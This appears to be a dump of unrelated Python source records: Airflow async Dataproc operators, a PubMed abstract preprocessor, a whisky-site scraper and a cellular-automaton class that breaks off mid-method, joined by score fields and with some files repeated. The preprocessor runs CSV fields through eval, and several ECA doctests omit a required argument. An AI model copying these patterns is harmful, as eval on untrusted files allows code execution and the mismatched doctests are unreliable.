If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
def execute(self, context: Context) -> None: # type: ignore[override]
"""Call create cluster API and defer to DataprocCreateClusterTrigger to check the status"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id)
DataprocLink.persist(
context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
)
try:
hook.create_cluster(
region=self.region,
project_id=self.project_id,
cluster_name=self.cluster_name,
cluster_config=self.cluster_config,
labels=self.labels,
request_id=self.request_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
except AlreadyExists:
if not self.use_if_exists:
raise
self.log.info("Cluster already exists.")
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocCreateClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
end_time=end_time,
metadata=self.metadata,
delete_on_error=self.delete_on_error,
cluster_config=self.cluster_config,
labels=self.labels,
gcp_conn_id=self.gcp_conn_id,
polling_interval=self.polling_interval,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "success":
self.log.info("Cluster created successfully \n %s", event["data"])
return event["data"]
elif event and event["status"] == "error":
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback")
class DataprocDeleteClusterOperatorAsync(DataprocDeleteClusterOperator):
"""
Delete a cluster on Google Cloud Dataproc Asynchronously.
:param region: Required. The Cloud Dataproc region in which to handle the request (templated).
:param cluster_name: Required. The cluster name (templated).
:param project_id: Optional. The ID of the Google Cloud project that the cluster belongs to (templated).
:param cluster_uuid: Optional. Specifying the ``cluster_uuid`` means the RPC should fail
if cluster with specified UUID does not exist.
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
if self.timeout is None:
self.timeout: float = 24 * 60 * 60
def execute(self, context: "Context") -> None:
"""Call delete cluster API and defer to wait for cluster to completely deleted"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
self.log.info("Deleting cluster: %s", self.cluster_name)
hook.delete_cluster(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
cluster_uuid=self.cluster_uuid,
request_id=self.request_id,
retry=self.retry,
metadata=self.metadata,
)
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocDeleteClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
request_id=self.request_id,
retry=self.retry,
end_time=end_time,
metadata=self.metadata,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "error":
raise AirflowException(event["message"])
elif event is None:
raise AirflowException("No event received in trigger callback")
self.log.info("Cluster deleted.")
class DataprocSubmitJobOperatorAsync(DataprocSubmitJobOperator):
"""
Submits a job to a cluster and wait until is completely finished or any error occurs.
:param project_id: Optional. The ID of the Google Cloud project that the job belongs to.
:param region: Required. The Cloud Dataproc region in which to handle the request.
:param job: Required. The job resource.
If a dict is provided, it must be of the same form as the protobuf message
class:`~google.cloud.dataproc_v1.types.Job`
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``SubmitJobRequest`` requests with the same id, then the second request will be ignored and the first
``Job`` created and stored in the backend is returned.
It is recommended to always set this value to a UUID.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
"""
def execute(self, context: "Context") -> None:
"""
Airflow runs this method on the worker and defers using the trigger.
Submit the job and get the job_id using which we defer and poll in trigger
"""
self.log.info("Submitting job \n %s", self.job)
self.hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
job_object = self.hook.submit_job(
project_id=self.project_id,
region=self.region,
job=self.job,
request_id=self.request_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
job_id = job_object.reference.job_id
self.log.info("Job %s submitted successfully.", job_id)
self.job_id = job_id
self.defer(
timeout=self.execution_timeout,
trigger=DataProcSubmitTrigger(
gcp_conn_id=self.gcp_conn_id,
dataproc_job_id=job_id,
project_id=self.project_id,
region=self.region,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, str]] = None) -> str:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event:
if event["status"] == "success":
self.log.info("Job %s completed successfully.", event["job_id"])
return event["job_id"]
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback")
class DataprocUpdateClusterOperatorAsync(DataprocUpdateClusterOperator):
"""
Updates an existing cluster in a Google cloud platform project.
:param region: Required. The Cloud Dataproc region in which to handle the request.
:param project_id: Optional. The ID of the Google Cloud project the cluster belongs to.
:param cluster_name: Required. The cluster name.
:param cluster: Required. The changes to the cluster.
If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.cloud.dataproc_v1.types.Cluster`
:param update_mask: Required. Specifies the path, relative to ``Cluster``, of the field to update. For
example, to change the number of workers in a cluster to 5, the ``update_mask`` parameter would be
specified as ``config.worker_config.num_instances``, and the ``PATCH`` request body would specify the
new value. If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.protobuf.field_mask_pb2.FieldMask`
:param graceful_decommission_timeout: Optional. Timeout for graceful YARN decommissioning. Graceful
decommissioning allows removing nodes from the cluster without interrupting jobs in progress. Timeout
specifies how long to wait for jobs in progress to finish before forcefully removing nodes (and
potentially interrupting jobs). Default timeout is 0 (for forceful decommission), and the maximum
allowed timeout is 1 day.
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``UpdateClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
if self.timeout is None:
self.timeout: float = 24 * 60 * 60
def execute(self, context: "Context") -> None:
"""Call update cluster API and defer to wait for cluster update to complete"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
# Save data required by extra links no matter what the cluster status will be
DataprocLink.persist(
context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
)
self.log.info("Updating %s cluster.", self.cluster_name)
hook.update_cluster(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
cluster=self.cluster,
update_mask=self.update_mask,
graceful_decommission_timeout=self.graceful_decommission_timeout,
request_id=self.request_id,
retry=self.retry,
metadata=self.metadata,
)
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocCreateClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
end_time=end_time,
metadata=self.metadata,
gcp_conn_id=self.gcp_conn_id,
polling_interval=self.polling_interval,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "success":
self.log.info("Updated %s cluster.", event["cluster_name"])
return
if event and event["status"] == "error":
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback") | 0.887613 | 0.452899 |
import os
from typing import List, Tuple
import random
import string
from collections import OrderedDict
import pandas as pd
from engine.utils.preprocessing import Preprocessor
from engine.utils.preprocess_utils import delete_overlapping_tuples
from engine.preprocess.preprocess_superclass import Preprocess
class ReplaceLongForms(Preprocess):
"""
When the instance of the class is executed, it will replace the
long forms by short forms.
You can define the probability of a substitution, and the min length
of the abstracts.
"""
def __init__(self, dataset: str, df_dictionary: pd.DataFrame, probability: float = 0.3, length_abstract: int = 200) -> None:
super().__init__(dataset, df_dictionary)
self.input_path = self.input_path + str("identified")
self.output_path = self.output_path + str("replaced")
self.probability = probability
self.preprocessor = Preprocessor(num_words_to_remove=50, remove_punctuation=False)
self.length_abstract = length_abstract
self.len_batch_key = 8
self.long_form_counts: OrderedDict[str, int] = OrderedDict(
dict.fromkeys(self.dictionary.keys(), 0)
)
self.long_form_loc: OrderedDict[str, list] = OrderedDict({
key: [] for key in self.dictionary.keys()
})
# ^ Creating the dict with dict.fromkeys was appending to all keys, that is why I changed
def __call__(self) -> None:
"""
When the instance of the class is executed, it will replace the
long forms by short forms.
"""
super().__call__()
super().batch_run()
def batch_run(self) -> None:
"""
Empty because the super class method is used.
"""
def decision(self) -> bool:
"""
Return True/False based on a given probability.
"""
return random.random() < self.probability
def generate_key(self) -> str:
"""
Function to generate a unique key for each abstract using the
pubmed file name and the row.
"""
return ''.join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(self.len_batch_key)
)
def replace_abstract(
self,
abstract: str,
long_forms: List[str],
span: List[Tuple[int, int]],
) -> Tuple[str, List[str], List[Tuple[int, int]]]:
"""
Given an abstract, it will replace the long forms by short forms.
If the short form was already in the text, it wont add more short forms.
Will return the replaced abstract and the list spans.
"""
replaced_abstract: str = abstract
span_updated: List[Tuple[int, int]] = []
long_forms_updated: List[str] = []
dict_span_lf = dict(zip(span, long_forms))
# Deal with tuple overlapping
clean_tuples = delete_overlapping_tuples(span)
# Iterave over each long form and span
correction_index: int = 0
for tup in clean_tuples:
if self.decision():
long_form = dict_span_lf[tup]
replaced_abstract = str(
replaced_abstract[: tup[0] + correction_index] + self.dictionary[long_form] +
replaced_abstract[tup[1] + correction_index :],
)
span_updated.append((
tup[0] + correction_index,
tup[0] + correction_index + len(self.dictionary[long_form])
))
correction_index = correction_index + len(self.dictionary[long_form]
) - len(long_form)
long_forms_updated.append(long_form)
return replaced_abstract, long_forms_updated, span_updated
def single_run(self, filename: str) -> None:
"""
Will load the csv file with the abstracts and replace the long
forms by short forms. Will add a unique key to each output row.
The key is generated using the filename.
"""
# Open csv file with abstracts
df_abstracts = pd.read_csv(
os.path.join(self.input_path, filename), converters={'long_forms': eval, 'span': eval}
)
df_results: pd.DataFrame = pd.DataFrame(
columns=['long_forms', 'span_short_form', 'replaced_abstract', 'unique_key']
)
batch_key: str = self.generate_key()
for i, row in df_abstracts.iterrows():
# check that the list is not empy and the length of the abstract.
if row['long_forms'] != [] and len(row['abstract']) > self.length_abstract:
# replace long forms. Need to convert span to tuples
replaced_abstract, long_forms_updated, span_updated = self.replace_abstract(
row['abstract'], row['long_forms'], row['span']
)
# Store in dataframe if not empty
if long_forms_updated != []:
# Define unique key
unique_key: str = batch_key + "_" + str(i)
# Update the dictionaries with the counts and keys
for long_form in long_forms_updated:
self.long_form_counts[long_form] += 1
self.long_form_loc[long_form].append(unique_key)
# Export to df
df_results = df_results.append({
'long_forms': long_forms_updated, 'span_short_form': span_updated,
'replaced_abstract': replaced_abstract, 'unique_key': unique_key
},
ignore_index=True)
# Export df to csv
new_filename: str = "{}.csv".format(batch_key)
df_results.to_csv(os.path.join(self.output_path, new_filename), index=False)
# Export dictionary to csv
df_counts = pd.DataFrame(
list(self.long_form_counts.items()), columns=['long_form', 'counts']
)
df_counts['unique_key'] = list(self.long_form_loc.values())
df_counts.to_csv(os.path.join(self.output_path, "counts.csv"), index=False) | engine/preprocess/replace_longforms.py | import os
from typing import List, Tuple
import random
import string
from collections import OrderedDict
import pandas as pd
from engine.utils.preprocessing import Preprocessor
from engine.utils.preprocess_utils import delete_overlapping_tuples
from engine.preprocess.preprocess_superclass import Preprocess
class ReplaceLongForms(Preprocess):
"""
When the instance of the class is executed, it will replace the
long forms by short forms.
You can define the probability of a substitution, and the min length
of the abstracts.
"""
def __init__(self, dataset: str, df_dictionary: pd.DataFrame, probability: float = 0.3, length_abstract: int = 200) -> None:
super().__init__(dataset, df_dictionary)
self.input_path = self.input_path + str("identified")
self.output_path = self.output_path + str("replaced")
self.probability = probability
self.preprocessor = Preprocessor(num_words_to_remove=50, remove_punctuation=False)
self.length_abstract = length_abstract
self.len_batch_key = 8
self.long_form_counts: OrderedDict[str, int] = OrderedDict(
dict.fromkeys(self.dictionary.keys(), 0)
)
self.long_form_loc: OrderedDict[str, list] = OrderedDict({
key: [] for key in self.dictionary.keys()
})
# ^ Creating the dict with dict.fromkeys was appending to all keys, that is why I changed
def __call__(self) -> None:
"""
When the instance of the class is executed, it will replace the
long forms by short forms.
"""
super().__call__()
super().batch_run()
def batch_run(self) -> None:
"""
Empty because the super class method is used.
"""
def decision(self) -> bool:
"""
Return True/False based on a given probability.
"""
return random.random() < self.probability
def generate_key(self) -> str:
"""
Function to generate a unique key for each abstract using the
pubmed file name and the row.
"""
return ''.join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(self.len_batch_key)
)
def replace_abstract(
self,
abstract: str,
long_forms: List[str],
span: List[Tuple[int, int]],
) -> Tuple[str, List[str], List[Tuple[int, int]]]:
"""
Given an abstract, it will replace the long forms by short forms.
If the short form was already in the text, it wont add more short forms.
Will return the replaced abstract and the list spans.
"""
replaced_abstract: str = abstract
span_updated: List[Tuple[int, int]] = []
long_forms_updated: List[str] = []
dict_span_lf = dict(zip(span, long_forms))
# Deal with tuple overlapping
clean_tuples = delete_overlapping_tuples(span)
# Iterave over each long form and span
correction_index: int = 0
for tup in clean_tuples:
if self.decision():
long_form = dict_span_lf[tup]
replaced_abstract = str(
replaced_abstract[: tup[0] + correction_index] + self.dictionary[long_form] +
replaced_abstract[tup[1] + correction_index :],
)
span_updated.append((
tup[0] + correction_index,
tup[0] + correction_index + len(self.dictionary[long_form])
))
correction_index = correction_index + len(self.dictionary[long_form]
) - len(long_form)
long_forms_updated.append(long_form)
return replaced_abstract, long_forms_updated, span_updated
def single_run(self, filename: str) -> None:
"""
Will load the csv file with the abstracts and replace the long
forms by short forms. Will add a unique key to each output row.
The key is generated using the filename.
"""
# Open csv file with abstracts
df_abstracts = pd.read_csv(
os.path.join(self.input_path, filename), converters={'long_forms': eval, 'span': eval}
)
df_results: pd.DataFrame = pd.DataFrame(
columns=['long_forms', 'span_short_form', 'replaced_abstract', 'unique_key']
)
batch_key: str = self.generate_key()
for i, row in df_abstracts.iterrows():
# check that the list is not empy and the length of the abstract.
if row['long_forms'] != [] and len(row['abstract']) > self.length_abstract:
# replace long forms. Need to convert span to tuples
replaced_abstract, long_forms_updated, span_updated = self.replace_abstract(
row['abstract'], row['long_forms'], row['span']
)
# Store in dataframe if not empty
if long_forms_updated != []:
# Define unique key
unique_key: str = batch_key + "_" + str(i)
# Update the dictionaries with the counts and keys
for long_form in long_forms_updated:
self.long_form_counts[long_form] += 1
self.long_form_loc[long_form].append(unique_key)
# Export to df
df_results = df_results.append({
'long_forms': long_forms_updated, 'span_short_form': span_updated,
'replaced_abstract': replaced_abstract, 'unique_key': unique_key
},
ignore_index=True)
# Export df to csv
new_filename: str = "{}.csv".format(batch_key)
df_results.to_csv(os.path.join(self.output_path, new_filename), index=False)
# Export dictionary to csv
df_counts = pd.DataFrame(
list(self.long_form_counts.items()), columns=['long_form', 'counts']
)
df_counts['unique_key'] = list(self.long_form_loc.values())
df_counts.to_csv(os.path.join(self.output_path, "counts.csv"), index=False) | 0.801431 | 0.327037 |
from bs4 import BeautifulSoup
import requests
from typing import List, Dict
import json
import time
def get_all_whiskys(urls: List[str], headers: Dict[str, str]) -> Dict[str, str]:
"""Function to scrape name and further details link from each row of whisky from every page on each url in a list of urls from masterofmalt.com
Args:
urls (List[str]): urls list
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: returns a dict of whisky name and link to full page of details
"""
# Initialise empty dict
links: Dict[str, str] = {}
# Begin loop over url list
for url in urls:
print(f"Starting {url}")
# Initialise page_count variable
page_count: int = 1
# Start while loop to go over every page from each url
while True:
# Start at page 1 and go till end
if page_count >= 1:
print(f"Processing page {page_count}...")
# Beautifulsoup4 request url and soup init
req = requests.get(f"{url}/{page_count}", headers)
soup = BeautifulSoup(req.content, 'html.parser')
# Test to see if page count has been exceeded
try:
content = soup.find("div", id="productBoxWideContainer")
except AttributeError:
break
# Test to see if page count has been exceeded
try:
rows = list(content.find_all(
"div", class_="boxBgr product-box-wide h-gutter js-product-box-wide"))
except AttributeError:
break
# If page_count is within total pages, loop over rows and add
# title of whisky and link to more details page to dict
for row in rows:
query = row.find("h3")
h3 = query.get_text()
link = query.find("a").get('href')
links[h3]: str = link
print(f"Processed page {page_count}!")
# Increment page_count
page_count += 1
print(f"Finished {url}")
# Return dict of whisky titles and links
return links
def scrape_each_whisky(get_all_whiskys_data: Dict[str, str], headers: Dict[str, str]) -> Dict[str, str]:
"""Uses the get_all_whiskys() data to open links and scrape details on each whisky to build a dict.
Args:
get_all_whiskys_data (Dict[str, str]): result from get_all_whiskys()
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: scraped whisky data for each whisky in get_all_whiskys_data and errors
"""
# Initialise empty dicts for return
scraped_data: Dict[str, str] = {}
errors: Dict[str, str] = {}
count: int = 1
total: int = len(get_all_whiskys_data)
# Begin loop over passed data
for whisky in get_all_whiskys_data:
if whisky in scraped_data:
print(f"{whisky} already exists")
else:
try:
print(f"[{count}/{total}] - Scraping {whisky} info...")
req = requests.get(
f"{get_all_whiskys_data[whisky]}", headers)
soup: BeautifulSoup = BeautifulSoup(req.content, 'html.parser')
title: str = soup.find(
"h1", id='ContentPlaceHolder1_pageH1').get_text()
initial_image = soup.find("div", id='imgProductBigDiv').find(
"div", class_='productImageWrap').find("img").get("src")
image: str = "".join(initial_image[2:])
# Attempt to get Varietal (Country)
varietal: str = detailed_data(soup, "Country")
# Attempt to get Region
region: str = detailed_data(soup, "Region")
# Attempt to get Brand
brand: str = detailed_data(soup, "Distillery")
# Attempt to get Age
age: str = detailed_data(soup, "YearsMatured")
# Attempt to get Style
style: str = detailed_data(soup, "Style")
# Attempt to get Alcohol Percentage
alcohol_percentage: str = detailed_data(soup, "Alcohol")
scraped_data[title] = {
"Country": "",
"Image": image,
"Varietal": varietal,
"Region": region,
"Whisky Style": style,
"Brand Name": brand,
"Name": title,
"Age": age,
"Alcohol Volume (%)": alcohol_percentage,
"Price ($ per bottle)": "",
"Peated (Y/N)": "",
"Rating ( /10)": ""}
# print(data)
print(f"Scraped {whisky}!")
except AttributeError:
print(f"Error on: {whisky}")
errors[whisky] = get_all_whiskys_data[whisky]
continue
count += 1
return {"scraped_data": scraped_data, "errors": errors}
def detailed_data(soup: BeautifulSoup, url_end: str) -> str:
"""Helper function for scrape_each_whisky() to return either one of three possible values.
Args:
soup (BeautifulSoup): initialised BeautifulSoup instance
url_end (str): the suffix of the url to identify element
Returns:
str: value of element or empty string
"""
result: str = ""
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl00_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
# Attempt to get alternative id value
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl01_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
return result
return result | web-scraper/src/scraping_functions.py | from bs4 import BeautifulSoup
import requests
from typing import List, Dict
import json
import time
def get_all_whiskys(urls: List[str], headers: Dict[str, str]) -> Dict[str, str]:
"""Function to scrape name and further details link from each row of whisky from every page on each url in a list of urls from masterofmalt.com
Args:
urls (List[str]): urls list
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: returns a dict of whisky name and link to full page of details
"""
# Initialise empty dict
links: Dict[str, str] = {}
# Begin loop over url list
for url in urls:
print(f"Starting {url}")
# Initialise page_count variable
page_count: int = 1
# Start while loop to go over every page from each url
while True:
# Start at page 1 and go till end
if page_count >= 1:
print(f"Processing page {page_count}...")
# Beautifulsoup4 request url and soup init
req = requests.get(f"{url}/{page_count}", headers)
soup = BeautifulSoup(req.content, 'html.parser')
# Test to see if page count has been exceeded
try:
content = soup.find("div", id="productBoxWideContainer")
except AttributeError:
break
# Test to see if page count has been exceeded
try:
rows = list(content.find_all(
"div", class_="boxBgr product-box-wide h-gutter js-product-box-wide"))
except AttributeError:
break
# If page_count is within total pages, loop over rows and add
# title of whisky and link to more details page to dict
for row in rows:
query = row.find("h3")
h3 = query.get_text()
link = query.find("a").get('href')
links[h3]: str = link
print(f"Processed page {page_count}!")
# Increment page_count
page_count += 1
print(f"Finished {url}")
# Return dict of whisky titles and links
return links
def scrape_each_whisky(get_all_whiskys_data: Dict[str, str], headers: Dict[str, str]) -> Dict[str, str]:
"""Uses the get_all_whiskys() data to open links and scrape details on each whisky to build a dict.
Args:
get_all_whiskys_data (Dict[str, str]): result from get_all_whiskys()
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: scraped whisky data for each whisky in get_all_whiskys_data and errors
"""
# Initialise empty dicts for return
scraped_data: Dict[str, str] = {}
errors: Dict[str, str] = {}
count: int = 1
total: int = len(get_all_whiskys_data)
# Begin loop over passed data
for whisky in get_all_whiskys_data:
if whisky in scraped_data:
print(f"{whisky} already exists")
else:
try:
print(f"[{count}/{total}] - Scraping {whisky} info...")
req = requests.get(
f"{get_all_whiskys_data[whisky]}", headers)
soup: BeautifulSoup = BeautifulSoup(req.content, 'html.parser')
title: str = soup.find(
"h1", id='ContentPlaceHolder1_pageH1').get_text()
initial_image = soup.find("div", id='imgProductBigDiv').find(
"div", class_='productImageWrap').find("img").get("src")
image: str = "".join(initial_image[2:])
# Attempt to get Varietal (Country)
varietal: str = detailed_data(soup, "Country")
# Attempt to get Region
region: str = detailed_data(soup, "Region")
# Attempt to get Brand
brand: str = detailed_data(soup, "Distillery")
# Attempt to get Age
age: str = detailed_data(soup, "YearsMatured")
# Attempt to get Style
style: str = detailed_data(soup, "Style")
# Attempt to get Alcohol Percentage
alcohol_percentage: str = detailed_data(soup, "Alcohol")
scraped_data[title] = {
"Country": "",
"Image": image,
"Varietal": varietal,
"Region": region,
"Whisky Style": style,
"Brand Name": brand,
"Name": title,
"Age": age,
"Alcohol Volume (%)": alcohol_percentage,
"Price ($ per bottle)": "",
"Peated (Y/N)": "",
"Rating ( /10)": ""}
# print(data)
print(f"Scraped {whisky}!")
except AttributeError:
print(f"Error on: {whisky}")
errors[whisky] = get_all_whiskys_data[whisky]
continue
count += 1
return {"scraped_data": scraped_data, "errors": errors}
def detailed_data(soup: BeautifulSoup, url_end: str) -> str:
"""Helper function for scrape_each_whisky() to return either one of three possible values.
Args:
soup (BeautifulSoup): initialised BeautifulSoup instance
url_end (str): the suffix of the url to identify element
Returns:
str: value of element or empty string
"""
result: str = ""
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl00_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
# Attempt to get alternative id value
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl01_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
return result
return result | 0.721351 | 0.289557 |
import numpy as np
from .network import BooleanNetwork
class ECA(BooleanNetwork):
"""
ECA is a class to represent elementary cellular automaton rules. Each ECA
contains an 8-bit integral member variable ``code`` representing the
Wolfram code for the ECA rule and a set of boundary conditions which is
either ``None``, signifying periodic boundary conditions, or a pair of
cell states signifying fixed, open boundary conditions.
"""
def __init__(self, code, size, boundary=None):
"""
Construct an elementary cellular automaton rule.
.. rubric:: Examples
.. doctest:: automata
>>> ca = ECA(30, 5)
>>> ca.code
30
>>> ca.size
5
>>> ca.boundary
>>> ca = ECA(30, 5, boundary=(0,0))
>>> ca.boundary
(0, 0)
:param code: the Wolfram code for the ECA
:type code: int
:param size: the size of the ECA's lattice
:type size: int
:param boundary: the boundary conditions for the CA
:type boundary: tuple or None
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
super(ECA, self).__init__(size)
self.code = code
self.boundary = boundary
@property
def code(self):
"""
The Wolfram code of the elementary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30, 5)
>>> eca.code
30
>>> eca.code = 45
>>> eca.code
45
>>> eca.code = 256
Traceback (most recent call last):
...
ValueError: invalid ECA code
:type: int
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
"""
return self.__code
@code.setter
def code(self, code):
if not isinstance(code, int):
raise TypeError("ECA code is not an int")
if 255 < code or code < 0:
raise ValueError("invalid ECA code")
self.__code = code
@property
def size(self):
return self._size
@size.setter
def size(self, size):
if not isinstance(size, int):
raise TypeError("ECA size is not an int")
if size < 1:
raise ValueError("ECA size is negative")
self._size = size
self._volume = 2**size
self._shape = [2] * size
@property
def boundary(self):
"""
The boundary conditions of the elemenary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30)
>>> eca.boundary
>>> eca.boundary = (0,1)
>>> eca.boundary
(0, 1)
>>> eca.boundary = None
>>> eca.boundary
>>> eca.boundary = [0,1]
Traceback (most recent call last):
...
TypeError: ECA boundary are neither None nor a tuple
:type: ``None`` or tuple
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
return self.__boundary
@boundary.setter
def boundary(self, boundary):
if boundary and not isinstance(boundary, tuple):
raise TypeError("ECA boundary are neither None nor a tuple")
if boundary:
if len(boundary) != 2:
raise ValueError("invalid ECA boundary conditions")
for x in boundary:
if x != 0 and x != 1:
raise ValueError("invalid ECA boundary value")
self.__boundary = boundary
def _unsafe_update(self, lattice, index=None, pin=None, values=None):
"""
Update the state of the ``lattice``, in place, without
checking the validity of the arguments.
.. rubric:: Basic Use:
.. doctest:: automata
>>> ca = ECA(30)
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs)
[0, 1, 1, 1, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update([0,0,1,0,0])
[1, 1, 1, 1, 1]
.. rubric:: Single-Node Update:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, index=1)
[0, 1, 1, 0, 0]
>>> xs
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, index=-1)
[0, 1, 1, 0, 1]
.. rubric:: State Pinning:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, pin=[-2])
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, pin=[4])
[0, 1, 0, 1, 0]
.. rubric:: Value Fixing:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, values={0:1,-2:0})
[1, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> xs = [1,1,1,0,0]
>>> ca._unsafe_update(xs, values={1:0,-1:0})
[0, 0, 0, 1, 0]
:param lattice: the one-dimensional sequence of states
:type lattice: sequence
:param index: the index to update (or None)
:param pin: a sequence of indicies to pin (or None)
:param values: a dictionary of index-value pairs to fix after update
:returns: the updated lattice
"""
pin_states = pin is not None and pin != []
if self.boundary:
left = self.__boundary[0]
